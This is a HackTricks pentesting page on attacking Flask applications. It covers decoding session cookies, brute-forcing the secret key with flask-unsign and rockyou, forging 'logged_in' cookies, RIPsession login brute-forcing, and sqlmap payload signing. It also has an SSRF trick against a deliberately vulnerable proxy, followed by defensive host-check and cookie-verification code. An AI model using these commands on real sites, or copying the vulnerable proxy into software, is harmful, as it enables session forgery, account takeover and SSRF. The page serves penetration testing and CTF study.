hacktricks/network-services-pentesting/pentesting-web/flask.md

# Flask

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
<figure><img src="../../.gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure>

Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**

## Cookies

Default session cookie name is **`session`**.

### Decoder Wizard

Online Flask cookie decoder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)

#### Manual

Get the first part of the cookie, up to the first dot, and Base64 decode it:

```bash
echo "ImhlbGxvIg" | base64 -d
```

The cookie is also signed using a password (the application's secret key).

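To see what the three dot-separated parts of the cookie are, and how the signature ties them to that secret, here is an added example (not from the page or from flask-unsign) that parses a cookie without the key and verifies or re-signs one when the key is known. It reproduces the defaults of Flask's `SecureCookieSessionInterface` (salt `cookie-session`, HMAC key derivation, SHA1) with the standard library only; the sample cookie is the one from the flask-unsign command below and `CHANGEME` is a constructed key.

```python
import base64
import hashlib
import hmac
import json
import zlib

SALT = b"cookie-session"  # salt Flask's SecureCookieSessionInterface passes to itsdangerous

def b64decode_nopad(s):
    # itsdangerous strips the '=' padding from every part; restore it before decoding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64encode_nopad(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def parse_flask_session(cookie):
    """Split a cookie into (payload dict, timestamp, signature) without the secret.
    Layout: base64url(json) "." base64url(big-endian timestamp) "." base64url(hmac)."""
    payload_b64, ts_b64, sig_b64 = cookie.rsplit(".", 2)
    if payload_b64.startswith("."):  # leading '.' marks a zlib-compressed payload
        payload = zlib.decompress(b64decode_nopad(payload_b64[1:]))
    else:
        payload = b64decode_nopad(payload_b64)
    timestamp = int.from_bytes(b64decode_nopad(ts_b64), "big")
    return json.loads(payload), timestamp, sig_b64

def flask_signature(secret_key, signed_part):
    # key_derivation="hmac": key = HMAC-SHA1(secret, SALT); sig = HMAC-SHA1(key, "payload.ts")
    derived = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    return hmac.new(derived, signed_part.encode(), hashlib.sha1).digest()

def verify_flask_session(cookie, secret_key):
    """True only when the signature matches: an edited payload or a wrong key fails."""
    payload_b64, ts_b64, sig_b64 = cookie.rsplit(".", 2)
    expected = flask_signature(secret_key, f"{payload_b64}.{ts_b64}")
    return hmac.compare_digest(b64decode_nopad(sig_b64), expected)

def sign_flask_session(data, secret_key, timestamp, compress=False):
    """Reference signer with the same scheme, used here for a round-trip check."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    payload_b64 = "." + b64encode_nopad(zlib.compress(raw)) if compress else b64encode_nopad(raw)
    ts_b64 = b64encode_nopad(timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big"))
    signed_part = f"{payload_b64}.{ts_b64}"
    return f"{signed_part}.{b64encode_nopad(flask_signature(secret_key, signed_part))}"
```

The timestamp part is what lets the server expire old cookies (`PERMANENT_SESSION_LIFETIME`), so a verifier in production must also compare it against the current time, which this example leaves out.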
### **Flask-Unsign**

Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
{% embed url="https://pypi.org/project/flask-unsign/" %}
```bash
pip3 install flask-unsign
```

#### **Decode Cookie**

```bash
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
```

To decode a Flask session cookie you can also use the `itsdangerous` library in Python, which is the library Flask itself signs the cookie with. The session cookie is a base64-encoded string with the session data, followed by a timestamp and a signature.

Here is an example of how to decode a Flask session cookie:
```python
import hashlib
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer

def decode_cookie(cookie_value, secret_key):
    # Flask's SecureCookieSessionInterface signs with salt "cookie-session", HMAC key
    # derivation and SHA1; with other settings loads() rejects a genuine cookie as BadSignature
    serializer = URLSafeTimedSerializer(
        secret_key,
        salt="cookie-session",
        serializer=TaggedJSONSerializer(),
        signer_kwargs={"key_derivation": "hmac", "digest_method": hashlib.sha1},
    )
    try:
        return serializer.loads(cookie_value)
    except Exception as e:  # BadSignature, BadTimeSignature, BadPayload...
        return str(e)
```

In the above code, the `decode_cookie` function takes two parameters: `cookie_value` and `secret_key`. The `cookie_value` parameter is the value of the session cookie you want to decode, and the `secret_key` parameter is the secret key used to sign the cookie.
The `URLSafeTimedSerializer` class from the `itsdangerous` library is used to create a serializer object configured with the same salt, key derivation and digest Flask uses; the `loads` method of the serializer object then verifies the signature and decodes the cookie value.
If the decoding is successful, the decoded data is returned. Otherwise, an exception is raised and the error message is returned as a string.

Remember that decoding a session cookie can be useful for analyzing the information stored in it, but it should not be used to modify or tamper with the session data.
#### **Brute Force**

```bash
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
```

#### **Signing**

```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```

#### Signing using a legacy (old) version

Signing using the legacy (old) version is a way of signing data with an older version of the protocol or algorithm. This can be dangerous because the older version may contain weaknesses or shortcomings that could lead to data leakage or attacks.

Before signing with the legacy version it is important to understand the risks involved and carry out a security assessment. It is best to use the current version of the protocol or algorithm to ensure the security of your data.
If for some reason you need to sign with the legacy version, make sure you follow security guidelines and take additional steps to protect your data. Also work with security experts to ensure that your signing process is carried out securely and correctly.

```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```
### **RIPsession**

Command line tool to brute-force websites using cookies crafted with flask-unsign.

{% embed url="https://github.com/Tagvi/ripsession" %}
```bash
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
```

### SQLi in Flask session cookie with SQLmap

[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses the sqlmap `eval` option to **automatically sign sqlmap payloads** using a known secret.

## Flask Proxy to SSRF

[**In this writeup**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) it is explained how Flask allows a request starting with the character "@":
```http
GET @/ HTTP/1.1
Host: target.com
Connection: close
```

In the following scenario:
```python
from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
    # the user-controlled path is concatenated straight into the upstream URL
    return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)
```

This allows introducing something like "@attacker.com" in order to cause **SSRF**.
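The check a proxy like the one above should apply before fetching, written as an added example that is not part of the writeup or the snippet above. It assumes a base URL without the trailing slash (`https://google.com`), so that an `@` in the user-supplied path lands in the URL's authority and moves the parsed host; `attacker.com` is the constructed host from the text.

```python
from urllib.parse import urlsplit

# Assumed upstream for this example: the same site as the proxy above but without
# the trailing slash, so "@..." in the path ends up inside the URL authority
UPSTREAM = "https://google.com"
ALLOWED_HOST = "google.com"


def build_upstream_url(base, path):
    # Same string concatenation the vulnerable proxy uses: no parsing, no validation
    return f"{base}{path}"


def upstream_host_ok(url, allowed_host):
    """Parse the URL the way the HTTP client will and check where it really points.
    'https://google.com@attacker.com/' parses as userinfo 'google.com' and host
    'attacker.com', so the hostname comparison catches the trick; a userinfo part
    is rejected outright because the upstream never needs credentials in the URL."""
    parts = urlsplit(url)
    return (
        parts.scheme in ("http", "https")
        and parts.hostname == allowed_host
        and parts.username is None
    )


def proxy_target(path, base=UPSTREAM, allowed_host=ALLOWED_HOST):
    """Return the URL to fetch, or None when the user-controlled path has moved
    the request to a different host (the SSRF case)."""
    url = build_upstream_url(base, path)
    return url if upstream_host_ok(url, allowed_host) else None
```

Checking the host on the string the client will actually parse, rather than on the input, is what makes this robust: the decision is taken on the same interpretation `requests` will use.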